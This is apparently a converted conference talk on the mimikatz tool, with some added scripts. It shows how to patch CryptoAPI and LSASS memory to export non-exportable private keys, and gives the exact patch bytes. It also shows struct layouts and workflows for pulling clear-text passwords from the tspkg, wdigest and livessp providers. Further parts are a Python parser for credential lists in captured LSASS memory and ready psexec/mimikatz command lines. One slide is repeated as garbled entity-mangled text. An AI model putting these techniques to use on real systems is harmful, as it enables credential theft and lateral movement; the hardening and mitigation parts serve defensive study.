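    # CredSSP "Allow delegating default credentials" (1 = enabled): the setting TsPkg SSO needs.
    $allowDefaultCreds = Get-RegValue $cred 'AllowDefaultCredentials'

    [pscustomobject]@{
        SecurityPackages        = $packages
        RiskyPackagesLoaded     = $loadedRisky
        RestrictSendingNTLM     = $sendNtlm
        RestrictReceivingNTLM   = $recvNtlm
        AuditReceivingNTLM      = $auditNtlm
        LmCompatibilityLevel    = $lmLevel
        AllowDefaultCredentials = $allowDefaultCreds
        Findings                = @(
            if ($loadedRisky.Count -gt 0) { "SSPs loaded that keep reversible credentials: $($loadedRisky -join ', ')" }
            if ($null -eq $sendNtlm -or $sendNtlm -lt 2) { 'Outgoing NTLM not denied (RestrictSendingNTLMTraffic < 2)' }
            if ($null -eq $recvNtlm -or $recvNtlm -lt 2) { 'Incoming NTLM not denied (RestrictReceivingNTLMTraffic < 2)' }
            if ($null -eq $lmLevel -or $lmLevel -lt 5)   { 'LmCompatibilityLevel < 5 (LM/NTLMv1 responses still accepted)' }
            if ($allowDefaultCreds -eq 1)                { 'CredSSP default credential delegation enabled (TsPkg SSO path)' }
        )
    }
}

Get-LsaHardeningReport | Format-List
```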
mimikatz :: crypto - what is it?
A little module that I wrote to
- play with Windows Cryptographic API, CNG and RSA keys
- automate export of certificates/keys
  - Even those which are "not" exportable
What crypto module can do
- List
  - Providers
  - Stores
  - Certificates
  - Keys
- Export
  - Certificates
    - public, in DER format
    - with private keys, in PFX format
  - Private keys in PVK format - it's cool, OpenSSL can deal with it too
- Patch
  - CryptoAPI in mimikatz context
  - CNG in LSASS context (again ;))
mod_mimikatz_crypto
mimikatz :: crypto - how it's protected?
Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  - At least without the master keys and/or password of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
- Yes, a computer/server opens a "session"
Export/Usage can be limited by
- Password
- Popup
- Export/Archive flag not present
Constraint for most users. Unavailable for computer keys.
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi - how it works?
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." - http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere...) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, ... - cryptdll.dll, rsaenh.dll, ...
Processes deal with cryptographic keys through this API...
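An added inventory script for the defender's side of the three slides above (what the crypto module lists, how keys are protected, and which API holds them); it is not mimikatz code and not from the talk. It walks the user and machine "My" stores, reports for each certificate with a private key whether that key is held by a CryptoAPI CSP (in the calling process, rsaenh.dll) or by a CNG KSP, and whether the export flag is set. It assumes Windows PowerShell 5.1 on .NET Framework 4.6 or later, and classifies RSA keys only.

```powershell
# Private key inventory: store, API family, provider, container and exportability.
# Added example, not part of mimikatz. Requires .NET Framework 4.6+ (RSACertificateExtensions).
function Get-PrivateKeyInventory {
    param([string[]]$Stores = @('Cert:\CurrentUser\My', 'Cert:\LocalMachine\My'))

    foreach ($store in $Stores) {
        foreach ($cert in (Get-ChildItem -Path $store | Where-Object { $_.HasPrivateKey })) {
            $info = [ordered]@{
                Store      = $store
                Subject    = $cert.Subject
                Thumbprint = $cert.Thumbprint
                Api        = 'unknown (non-RSA or no access)'
                Provider   = $null
                Container  = $null
                Exportable = $null
            }

            # Legacy path: X509Certificate2.PrivateKey only resolves CSP (CryptoAPI) keys;
            # for a CNG key the getter fails ("Invalid provider type specified"), so catch it.
            $csp = $null
            try { $csp = $cert.PrivateKey } catch { $csp = $null }

            if ($csp -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                $ki = $csp.CspKeyContainerInfo
                $info.Api        = 'CryptoAPI (CSP)'
                $info.Provider   = $ki.ProviderName
                $info.Container  = $ki.KeyContainerName
                $info.Exportable = $ki.Exportable
            } else {
                # CNG path: open the key through its KSP and read the export policy flags.
                $rsa = $null
                try {
                    $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
                } catch { $rsa = $null }
                if ($rsa -is [System.Security.Cryptography.RSACng]) {
                    $key = $rsa.Key
                    $allowExport = [System.Security.Cryptography.CngExportPolicies]::AllowExport
                    $info.Api        = 'CNG (KSP)'
                    $info.Provider   = $key.Provider.Provider
                    $info.Container  = $key.KeyName
                    $info.Exportable = ([int]($key.ExportPolicy -band $allowExport) -ne 0)
                }
            }
            [pscustomobject]$info
        }
    }
}

# Exportable software keys are the ones a plain export (certutil, MMC, mimikatz) can already pull;
# the rest rely on the export flag checked by the CSP or the KeyIso service.
Get-PrivateKeyInventory | Sort-Object Store, Subject | Format-Table -AutoSize
```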
mimikatz :: crypto :: capi - how it's exported? ( level)
[Diagram: the process calls CryptoAPI and the RSA CSP. Load Private Key -> DPAPI decode -> Ask to export key -> Exportable? yes: Exported key; no: NTE_BAD_KEY_STATE. (PLAYSKOOL)]
mimikatz :: crypto :: patchcapi - because I own my process
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable
mimikatz # crypto::exportCertificates
Emplacement : CERT_SYSTEM_STORE_CURRENT_USER/My
 - Benjamin Delpy
	Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider : Microsoft Enhanced Cryptographic Provider v1.0
	Type : AT_KEYEXCHANGE
	Exportabilité : NON
	Taille clé : 2048
	Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
	Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz :: crypto :: patchcapi - because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi - demo time!
Import, export, import as not exportable... export!
mimikatz :: crypto :: patchcapi - limitations
Because
- I'm lazy
- I've seen, in the majority of cases, RSA keys for real-life use
  - Elliptic Curve, a little...
mimikatz crypto::patchcapi only deals with
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz :: crypto :: cng - how it works?
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context
Processes use RPC to call "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI... - It is, but it's not perfect...
mimikatz :: crypto :: cng - how it's exported? ( level)
KeyIso Service (LSASS Process)
[Diagram: the process calls CNG, which uses RPC to reach the KeyIso service inside LSASS (on NT6 a System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP). In LSASS: Load Private Key -> DPAPI decode -> Ask to export key -> Exportable? yes: Exported key; no: NTE_NOT_SUPPORTED. (PLAYSKOOL)]
mimikatz :: crypto :: patchcng - because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks if the key is exportable
mimikatz # crypto::exportKeys [user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité : NON
	Taille clé : 2048
	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
	mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng - because sometimes I own LSASS
This time, checks and keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng - demo time!
Import, export, import as not exportable... export, again!
mimikatz :: crypto :: patchcng - limitations
Patch operation needs some privileges
- Admin (debug privilege)
- SYSTEM
mimikatz crypto::patchcng only deals with
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
- certutil can...
mimikatz :: crypto :: patchcng - bonus
After one admin has patched LSASS, all users of the current system benefit from extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for export can work too
- Yeah, like the good old certutil!
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto - memo
Some commands
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates "CERT_SYSTEM_STORE_LOCAL_MACHINE" "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  - So yes, mimikatz can export it
mimikatz :: crypto - what we can do?
Exactly the same as for sekurlsa: it will prevent access to accounts / computer
- no admin, no admin, no admin...
Basics
- Use smartcards/tokens for user certificates
- Use Hardware Security Modules (HSM), even SoftHSM
More in depth
- See what Microsoft can do with TPM from Windows 8
  - Virtual SmartCard seems promising
- Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP
  - Their biometrics stuff was a little buggy ;)
mimikatz - what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
- Play with tokens & privileges
- Display SSDT x86 & x64
- List minifilters actions
- List Notifications (process, thread, image, registry)
- List Objects hooks and procedures
- ...
...
mimikatz - that's all folks!
Thanks to / Merci à
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  - Partners and Sponsors for sure!
- Microsoft for always considering it as normal/acceptable
- Security friends/community for their ideas & challenges
  - nagual, newsoft, mubix, ...
- You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz - architecture of sekurlsa & crypto
[Architecture diagram; labels in slide order: mimikatz.exe; command modules: mod_mimikatz_sekurlsa, mod_mimikatz_nogpo, mod_mimikatz_divers, mod_mimikatz_winmine, mod_mimikatz_impersonate, mod_mimikatz_inject, mod_mimikatz_samdump, mod_mimikatz_standard, mod_mimikatz_crypto, mod_mimikatz_handle, mod_mimikatz_system, mod_mimikatz_service, mod_mimikatz_process, mod_mimikatz_thread, mod_mimikatz_terminalserver, mod_mimikatz_privilege; shared libraries: mod_pipe, mod_inject, mod_memory, mod_parseur, mod_patch, mod_hive, mod_secacl, mod_privilege, mod_process, mod_service, mod_system, mod_thread, mod_ts, mod_text, mod_crypto, mod_cryptoapi, mod_cryptoacng; sekurlsa providers: msv_1_0, tspkg, wdigest, livessp, kerberos; injected DLLs: kappfree.dll, kelloworld.dll, klock.dll; driver: mimikatz.sys; sekurlsa.dll; samdump: sam, secrets; LSASS packages: msv_1_0, wdigest, livessp, kerberos, tspkg]
mimikatz :: sekurlsa - what is it?
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (the well known LSASS process)
What the sekurlsa module can dump
- MSV1_0 hashes
- TsPkg passwords
- Wdigest passwords
- LiveSSP passwords
- Kerberos passwords (!)
- ...
mod_mimikatz_sekurlsa
mimikatz :: sekurlsa - how LSA works ( level)
[Diagram: WinLogon hands user/domain/password to LsaSS; authentication packages: msv1_0, tspkg, wdigest, livessp, kerberos; authentication through msv1_0 (SAM) or kerberos with challenge/response. (PLAYSKOOL)]
mimikatz :: sekurlsa - how LSA works ( level)
Authentication packages
- take the user's credentials from the logon
- make their own stuff
- keep enough data in memory to compute responses to challenges (Single Sign On)
If we can get that data and inject it in another session of LSASS, we avoid the authentication part
This is the principle of « Pass-the-hash »
- In fact of « Pass-the-x »
mimikatz :: sekurlsa - history of « pass-the-... » 1/2
Pass-the-hash
- 1997 - Unix modified SAMBA client for hashes usage, Paul Ashton (EIGEN)
- 2000 - Private version of a Windows « LSA Logon Session Editor », Hernan Ochoa (CoreSecurity)
- 2007 - TechEd Microsoft: Marc Murray (TrueSec) presents msvctl and provides some downloads of it
- 2007 - « Pass the hash toolkit » published, Hernan Ochoa (CoreSecurity)
- 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French so not famous ;))
2007 was the year of pass the hash!
Pass-the-ticket
- 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support, Hernan Ochoa (Ampliasecurity)
mimikatz :: sekurlsa - history of « pass-the-... » 2/2
Pass-the-pass
- 05/2011 - mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
  - http://blog.gentilkiwi.com/securite/pass-the-pass
- 05/2011 - return of mimikatz: it dumps clear text passwords from the WDigest provider (unlimited this time ;))
  - http://blog.gentilkiwi.com/securite/re-pass-the-pass
- 05/2011 - Some organizations opened cases to Microsoft about it...
...Lots of time...
- beginning of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
- 03/2012 - Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction...
  - http://seclists.org/pen-test/2012/Mar/7
- 03/2012 - mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
  - http://blog.gentilkiwi.com/securite/rere-pass-the-pass
- 03/2012 - yeah, once again... more curious, but Kerberos keeps passwords in memory
  - http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
- 08/2012 - sekurlsa module without injection at all (ultra safe)
  - http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz :: sekurlsa :: tspkg
because sometimes the hash is not enough...
mimikatz :: sekurlsa :: tspkg - what is it?
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDesktop users' experience
- http://technet.microsoft.com/library/cc772108.aspx
Relies on CredSSP with Credentials Delegation (= Account delegation)
- Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool
- User does not have to type their password
- Password is not in the RDP file
- Password is not in user secrets
mimikatz :: sekurlsa :: tspkg - questions?
KB says that for it to work, we must enable « Default credentials » delegation
- "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
  - What? Our User/Domain/Password? | Hash? | Ticket? It seems...
- In all cases, the system seems to be vulnerable to pass-the-...
In what form? Our specs: [MS-CSSP]
- 2.2.1.2.1 TSPasswordCreds
  - The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN).
    TSPasswordCreds ::= SEQUENCE {
        domainName [0] OCTET STRING,
        userName   [1] OCTET STRING,
        password   [2] OCTET STRING
    }
- Challenge response for authentication?
  - Server: YES (TLS / Kerberos)
  - Client: NO, the password is sent to the server...
So the password resides somewhere in memory!
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
mimikatz :: sekurlsa :: tspkg, symbols & theory
Let's explore some symbols
– sounds cool… (thanks Microsoft)
Let's imagine a scenario
– Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
– Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  • TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • TS_PRIMARY_CREDENTIAL with clear text credentials…
kd> x tspkg!*clear*
75016d1c tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68 tspkg!TSDuplicatePassword = <no type information>
75011cd4 tspkg!TSHidePassword = <no type information>
750195ee tspkg!TSRevealPassword = <no type information>
75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg, workflow
Workflow: LsaEnumerateLogonSessions → for each LUID → lookup in tspkg!TSGlobalCredTable (RtlLookupElementGenericTableAvl) → KIWI_TS_CREDENTIAL → pTsPrimary → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

    typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
        PVOID unk0;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Password;
    } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_TS_CREDENTIAL {
    #ifdef _M_X64
        BYTE unk0[108];
    #elif defined _M_IX86
        BYTE unk0[64];
    #endif
        LUID LocallyUniqueIdentifier;
        PVOID unk1;
        PVOID unk2;
        PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
    } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

mimikatz :: sekurlsa :: tspkg, demo time!
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because a clear text password over http/https is not cool…
mimikatz :: sekurlsa :: wdigest, what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]" Wikipedia – http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios – Authenticated client access to a Web site – Authenticated client access using SASL – Authenticated client access with integrity protection to a directory service using LDAP" Microsoft – http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool
– No password over the network, just hashes
– No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest, what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[…]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI:[…])
Even after login, HA1 may change… the realm comes from the server side and cannot be determined before Windows logon.
The WDigest provider must have the elements to compute responses for different servers:
– Username
– Realm (from the server)
– Password
mimikatz :: sekurlsa :: wdigest, theory
This time we know
– that WDigest keeps the password in memory « by protocol », for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
– at offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– let's search for it in WDigest
– hypothesis seems verified
LsaProtectMemory
– at offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– let's search for it in WDigest
– SpAcceptCredentials takes the clear password in its arguments
  • protects it with LsaProtectMemory
  • updates or inserts data in the doubly linked list wdigest!l_LogSessList
.text:7409D151 _DigestCalcHA1@8         call dword ptr [eax+0B4h]   ; LsaUnprotectMemory
.text:74096C69 _SpAcceptCredentials@16  call dword ptr [eax+0B0h]   ; LsaProtectMemory
mimikatz :: sekurlsa :: wdigest, workflow
Workflow: LsaEnumerateLogonSessions → for each LUID → walk wdigest!l_LogSessList → search the linked list for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear

    typedef struct _KIWI_WDIGEST_LIST_ENTRY {
        struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
        struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
        DWORD UsageCount;
        struct _KIWI_WDIGEST_LIST_ENTRY *This;
        LUID LocallyUniqueIdentifier;
        […]
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
        […]
    } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
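The list walk above is the same pattern the livessp (LiveGlobalLogonSessionList) and NT5 kerberos (KerbLogonSessionList) workflows use, so one added example covers all three (not mimikatz code): parse a LIST_ENTRY-headed doubly linked list out of a captured memory region, match a LUID, and follow the LSA_UNICODE_STRING buffers. The entry layout is a simplified, hypothetical x86 one with no gap between the LUID and the strings; the real offsets are the slides' […] and change per build, which is why the tool carries per-OS offsets. The Password field stays as LsaProtectMemory output here; decrypting it needs the lsasrv keys discussed later in the deck.

```python
# Added example: walk a LIST_ENTRY-headed list in a captured LSASS region,
# find one logon session by LUID and resolve its LSA_UNICODE_STRINGs.
import struct

BASE = 0x75000000                          # hypothetical address of the captured region
LIST_ENTRY = struct.Struct("<II")          # Flink, Blink (x86 pointers)
LUID = struct.Struct("<Ii")                # LowPart, HighPart
UNICODE_STRING = struct.Struct("<HHI")     # Length, MaximumLength, Buffer
# Hypothetical entry: Flink Blink UsageCount This LUID UserName Domaine Password
ENTRY = struct.Struct("<IIIIIiHHIHHIHHI")
OFF_LUID, OFF_USER, OFF_DOMAIN, OFF_PASSWORD = 16, 24, 32, 40

class MemoryImage:
    """Bounds-checked reads from a captured region, addressed by virtual address."""
    def __init__(self, base: int, data: bytes):
        self.base, self.data = base, bytes(data)

    def read(self, addr: int, size: int) -> bytes:
        off = addr - self.base
        if off < 0 or off + size > len(self.data):
            raise ValueError(f"{size} bytes at {addr:#010x} fall outside the image")
        return self.data[off:off + size]

def read_unicode_string(mem: MemoryImage, addr: int) -> bytes:
    """Follow an LSA_UNICODE_STRING: Length bytes at Buffer (UTF-16LE, no terminator)."""
    length, _max_length, buffer = UNICODE_STRING.unpack(mem.read(addr, UNICODE_STRING.size))
    return mem.read(buffer, length)

def walk_list(mem: MemoryImage, head: int):
    """Yield entry addresses; the list is circular and ends when Flink returns to the head."""
    seen = set()
    cur = LIST_ENTRY.unpack(mem.read(head, LIST_ENTRY.size))[0]
    while cur != head:
        if cur in seen:
            raise ValueError("corrupted list: cycle that never returns to the head")
        seen.add(cur)
        yield cur
        cur = LIST_ENTRY.unpack(mem.read(cur, LIST_ENTRY.size))[0]

def find_session(mem: MemoryImage, head: int, luid: tuple):
    """Return the entry for one logon session LUID (LowPart, HighPart), or None."""
    for entry in walk_list(mem, head):
        if LUID.unpack(mem.read(entry + OFF_LUID, LUID.size)) == luid:
            return {
                "UserName": read_unicode_string(mem, entry + OFF_USER).decode("utf-16-le"),
                "Domaine": read_unicode_string(mem, entry + OFF_DOMAIN).decode("utf-16-le"),
                # Still LsaProtectMemory output: needs lsasrv's keys to decrypt.
                "ProtectedPassword": read_unicode_string(mem, entry + OFF_PASSWORD),
            }
    return None

def build_sample_image() -> bytes:
    """Constructed two-entry list (user/domain names from the demo slide)."""
    head = BASE
    entry_a = head + LIST_ENTRY.size
    entry_b = entry_a + ENTRY.size
    pool_base = entry_b + ENTRY.size
    pool = bytearray()

    def ustr(raw: bytes):          # place raw bytes in the pool, return the string header
        addr = pool_base + len(pool)
        pool.extend(raw)
        return len(raw), len(raw), addr

    fake_protected = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")  # placeholder ciphertext
    a = ENTRY.pack(entry_b, head, 1, entry_a, 234870, 0,
                   *ustr("Gentil Kiwi".encode("utf-16-le")),
                   *ustr("vm-w8-rp-x".encode("utf-16-le")),
                   *ustr(fake_protected))
    b = ENTRY.pack(head, entry_a, 1, entry_b, 999, 0,
                   *ustr("svc_backup".encode("utf-16-le")),
                   *ustr("LAB".encode("utf-16-le")),
                   *ustr(fake_protected[::-1]))
    return LIST_ENTRY.pack(entry_a, entry_b) + a + b + bytes(pool)

if __name__ == "__main__":
    image = MemoryImage(BASE, build_sample_image())
    for luid in ((234870, 0), (999, 0), (1, 0)):
        print(luid, find_session(image, BASE, luid))
```

Two details matter in practice and are easy to get wrong: the head is a bare LIST_ENTRY, not an entry, so the walk must stop on the pointer equality rather than on a count; and every pointer read is bounds-checked against the captured region, because a wrong per-build offset otherwise turns into a silent misparse rather than an error.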
mimikatz :: sekurlsa :: wdigest, demo time!
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp, how?
Actually, I've only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbol searching
~ Boring ~… let's be more brutal this time: make a WinDbg trap
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp, how?
Let's log in with a Live account on Windows 8.
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  [...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Our LiveSSP provider
Yeah! Pass-the-Hash capability with a Live account too…
A Live user can log on through RDP via SSO
mimikatz :: sekurlsa :: livessp, workflow
Workflow: LsaEnumerateLogonSessions → for each LUID → walk livessp!LiveGlobalLogonSessionList → search the linked list for the LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

    typedef struct _KIWI_LIVESSP_LIST_ENTRY {
        struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
        struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
        DWORD unk4;
        DWORD unk5;
        PVOID unk6;
